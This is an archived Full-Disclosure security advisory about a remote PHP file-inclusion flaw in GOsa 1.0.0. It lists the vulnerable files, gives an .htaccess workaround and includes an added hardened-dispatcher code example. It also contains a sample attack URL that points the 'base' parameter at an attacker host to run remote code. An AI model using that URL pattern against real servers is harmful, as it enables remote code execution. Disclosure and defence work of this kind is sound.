-----BEGIN PGP SIGNED MESSAGE-----

I. BACKGROUND

The GOnicus System Administrator (GOsa) is a PHP-based administration tool for managing accounts and systems in LDAP databases.
Project homepage: http://www.gonicus.de

II. DESCRIPTION

A remote attacker can inject arbitrary PHP code into GOsa that executes under the privileges of the underlying web server. There are several places where, by modifying certain request variables, an attacker can execute arbitrary PHP code.

By setting the "plugin" variable in the following files, an attacker can include remote files and execute them as PHP code:

plugins/3fax/1blocklists/index.php
plugins/2administration/6departamentadmin/index.php
plugins/2administration/5terminals/index.php
plugins/2administration/4mailinglists/index.php
plugins/2administration/3departaments/index.php
plugins/2administration/2groupd/index.php

The same situation exists in include/help.php, where the "base" variable can be set to a remote host so that a remote file is included. The following sample attack URL causes "target.server" to load include/common.inc from "attackers.server":

http://target.server/include/help.php?base=http://attackers.server/

GOsa doesn't support "register_globals off".

III. ANALYSIS

Remote exploitation allows an attacker to execute arbitrary commands and code under the privileges of the web server. This also opens the door to privilege escalation attacks. An attacker could also debug httpd child processes and grab secret information such as users' system passwords and LDAP passwords.

IV. DETECTION

GOsa version 1.0.0 (current) is confirmed vulnerable.

V. WORKAROUND

A temporary solution is to enable Apache .htaccess authentication in all subdirectories containing .php files that are meant to be included, not accessed directly.

Example .htaccess file (the directive is AuthUserFile; pointing it at /dev/null means no user can ever authenticate, so every direct request is refused):

AuthType Basic
AuthName koza
AuthUserFile /dev/null
require valid-user

- --
Karol Więsek [appelast-at-bsquad.sm.pl]
http://bsquad.sm.pl/
"A pub: the place you go every evening for the last time in your life."
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
Comment: Bear Software, LLC, http://bear-software.freeservers.com

iQCVAwUBPlksdkKKOIVhErCVAQEeaAP+PBSWgy6Dealk+B3nNEmTQnsOzgUUuDd+
KNAapeZmyyzmsHR+BmCAiKLICtau+3OivQbRyhuIjh/I1oXrmFRDSdZVEWaau6c4
peTHhoHaTEbOpn4Wuc0D1axJhaeCboc1syOY3sss/U8cd+jEz7wQgBvWRcbmR02H
VhwGjAjsVm8=
=TYVx
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
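The root cause the advisory describes is an include path assembled from a request variable (made reachable by register_globals). The following is an added example, not GOsa's code: it shows that unsafe pattern next to a hardened dispatcher in which request data only selects a key from a fixed allowlist and the include path is never built from user input. The variable names, the function names and the plugin map are assumptions for illustration.

```php
<?php
// Added example (not GOsa code): the unsafe include pattern the advisory
// describes, next to a hardened replacement. The variable names ($base,
// $plugin), the function names and the plugin map are assumptions.

// UNSAFE. With register_globals=on, $base is whatever the request supplied,
// so a URL-valued $base makes PHP fetch and execute remote code.
function unsafe_help_include(string $base): void
{
    include $base . 'include/common.inc';
}

// HARDENED. Request data only selects a key; the include path itself is
// fixed by the application and never concatenated from user input.
function plugin_map(): array
{
    return [
        'blocklists'   => '3fax/1blocklists/index.php',
        'terminals'    => '2administration/5terminals/index.php',
        'mailinglists' => '2administration/4mailinglists/index.php',
    ];
}

// Returns the absolute path of the plugin file, or null if the name is not
// allowlisted or the file does not resolve to a location inside $pluginRoot.
function resolve_plugin(string $name, string $pluginRoot): ?string
{
    $map = plugin_map();
    if (!array_key_exists($name, $map)) {      // URLs, "../", "" all fail here
        return null;
    }
    $root = realpath($pluginRoot);
    $path = realpath($pluginRoot . '/' . $map[$name]);
    if ($root === false || $path === false) {  // missing directory or file
        return null;
    }
    // Defence in depth: the resolved file must still sit under the plugin
    // root (guards against a symlinked plugin file pointing elsewhere).
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Dispatcher: read the request explicitly instead of relying on register_globals.
$plugin = (isset($_GET['plugin']) && is_string($_GET['plugin'])) ? $_GET['plugin'] : '';
$file = resolve_plugin($plugin, __DIR__ . '/plugins');
if ($file === null) {
    http_response_code(400);
    exit('unknown plugin');
}
require $file;
```

Setting allow_url_fopen = Off in php.ini (and allow_url_include = Off on PHP versions that have it) stops the remote fetch, but a path that is still concatenated from request data remains open to local file inclusion, so the allowlist lookup is the actual fix; the .htaccess workaround in the advisory complements it by refusing direct requests to files that should only ever be included.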
This archive was generated by hypermail 2b30 : Sun Feb 23 2003 - 13:31:47 PST